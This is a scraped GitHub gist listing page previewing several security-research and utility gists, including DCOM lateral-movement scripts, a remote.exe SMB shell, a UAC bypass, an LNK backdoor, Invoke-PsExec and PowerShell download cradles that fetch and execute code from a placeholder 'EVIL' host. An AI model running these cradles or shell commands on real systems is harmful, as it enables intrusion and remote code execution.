Skip to content

Instantly share code, notes, and snippets.

View mjmaley's full-sized avatar

Matt Maley mjmaley

17 followers · 57 following
View GitHub Profile
@001SPARTaN
001SPARTaN / dcom_shellexecute.cna
Last active March 7, 2021 16:25
# Lateral movement techniques based on research by enigma0x3 (Matt Nelson)
# https://enigma0x3.net/2017/01/05/lateral-movement-using-the-mmc20-application-com-object/
# https://enigma0x3.net/2017/01/23/lateral-movement-via-dcom-round-2/
# Beacon implementation based on comexec.cna by Raphael Mudge
# https://gist.github.com/rsmudge/8b2f699ea212c09201a5cb65650c6fa2
# Register alias
beacon_command_register ("dcom_shellexecute", "Lateral movement with DCOM (ShellExecute)",
"Usage: dcom_shellexecute [target] [listener]\n\n" .
"Spawn new Beacon on a target via DCOM ShellExecute Object.");
@rsmudge
rsmudge / comexec.cna
Created January 6, 2017 22:06
Lateral Movement with the MMC20.Application COM Object (Aggressor Script Alias)
# Lateral Movement alias
# https://enigma0x3.net/2017/01/05/lateral-movement-using-the-mmc20-application-com-object/
# register help for our alias
beacon_command_register("com-exec", "lateral movement with DCOM",
"Synopsis: com-exec [target] [listener]\n\n" .
"Run a payload on a target via DCOM MMC20.Application Object");
# here's our alias to collect our arguments
alias com-exec {
@kfatehi
kfatehi / hb_all_books_dl.js
Last active March 7, 2021 08:07 — forked from graymouser/hb_all_books_dl.js
Humble bundle book bundles - download all books at once
/*
After purchasing a humble book bundle, go to your download page for that bundle.
Open a console window for the page and paste in the below javascript
this fork downloads all formats and does so without using jquery (since that didnt work for me)
note that if you are in chrome, chrome will not download the pdfs for you by default, to fix this
type “about:plugins” in the address bar and disable chrome's pdf viewer
*/
var pattern = /(MOBI|EPUB|PDF)$/i;
@mattifestation
mattifestation / gist:8ef36782ceb7f73d74cfb00c2a710301
Created November 19, 2016 17:07
remote.exe - a useful, MS signed SMB shell
# Command to run on the victim
# This will establish a PowerShell listener over the "pwnme" named pipe
remote /S "powershell.exe" pwnme
# Commands to run on an attacker system - if remote.exe is desired on the client (versus developing your own SMB pipe client)
runas /netonly /user:[Domain|Hostname\Username] "cmd"
remote /C [Hostname\IP] "pwnme"
@mattifestation
mattifestation / UACBypass.ps1
Last active December 6, 2024 14:12
function Invoke-UACBypass {
<#
.SYNOPSIS
Bypasses UAC on Windows 10 by abusing the SilentCleanup task to win a race condition, allowing for a DLL hijack without a privileged file copy.
Author: Matthew Graeber (@mattifestation), Matt Nelson (@enigma0x3)
License: BSD 3-Clause
Required Dependencies: None
Optional Dependencies: None
@HarmJ0y
HarmJ0y / LNKBackdoor.ps1
Created July 4, 2016 20:49
Functions to 'backdoor' .LNK files with additional functionality and enumerate all 'backdoored' .LNKs on a system.
function Set-LNKBackdoor {
<#
.SYNOPSIS
Backdoors an existing .LNK shortcut to trigger the original binary and a payload specified by
-ScriptBlock or -Command.
Author: @harmj0y
License: BSD 3-Clause
Required Dependencies: None
@alirobe
alirobe / reclaimWindows10.ps1
Last active April 20, 2025 23:02
This Windows 10 Setup Script turns off a bunch of unnecessary Windows 10 telemetery, bloatware, & privacy things. Not guaranteed to catch everything. Review and tweak before running. Reboot after running. Scripts for reversing are included and commented. Fork of https://github.com/Disassembler0/Win10-Initial-Setup-Script (different defaults). N.…
###
###
### UPDATE: For Win 11, I recommend using this tool in place of this script:
### https://christitus.com/windows-tool/
### https://github.com/ChrisTitusTech/winutil
### https://www.youtube.com/watch?v=6UQZ5oQg8XA
### iwr -useb https://christitus.com/win | iex
###
### OR take a look at
### https://github.com/HotCakeX/Harden-Windows-Security
@HarmJ0y
HarmJ0y / DownloadCradles.ps1
Last active April 23, 2025 13:28
Download Cradles
# normal download cradle
IEX (New-Object Net.Webclient).downloadstring("http://EVIL/evil.ps1")
# PowerShell 3.0+
IEX (iwr 'http://EVIL/evil.ps1')
# hidden IE com object
$ie=New-Object -comobject InternetExplorer.Application;$ie.visible=$False;$ie.navigate('http://EVIL/evil.ps1');start-sleep -s 5;$r=$ie.Document.body.innerHTML;$ie.quit();IEX $r
# Msxml2.XMLHTTP COM object
@HarmJ0y
HarmJ0y / Invoke-Psexec.ps1
Last active September 12, 2022 02:41
Invoke-Psexec
function Invoke-PsExec {
<#
.SYNOPSIS
This function is a rough port of Metasploit's psexec functionality.
It utilizes Windows API calls to open up the service manager on
a remote machine, creates/run a service with an associated binary
path or command, and then cleans everything up.
Either a -Command or a custom -ServiceEXE can be specified.
For -Commands, a -ResultsFile can also be specified to retrieve the
@aras-p
aras-p / preprocessor_fun.h
Last active April 7, 2025 13:38
Things to commit just before leaving your job
// Just before switching jobs:
// Add one of these.
// Preferably into the same commit where you do a large merge.
//
// This started as a tweet with a joke of "C++ pro-tip: #define private public",
// and then it quickly escalated into more and more evil suggestions.
// I've tried to capture interesting suggestions here.
//
// Contributors: @r2d2rigo, @joeldevahl, @msinilo, @_Humus_,
// @YuriyODonnell, @rygorous, @cmuratori, @mike_acton, @grumpygiant,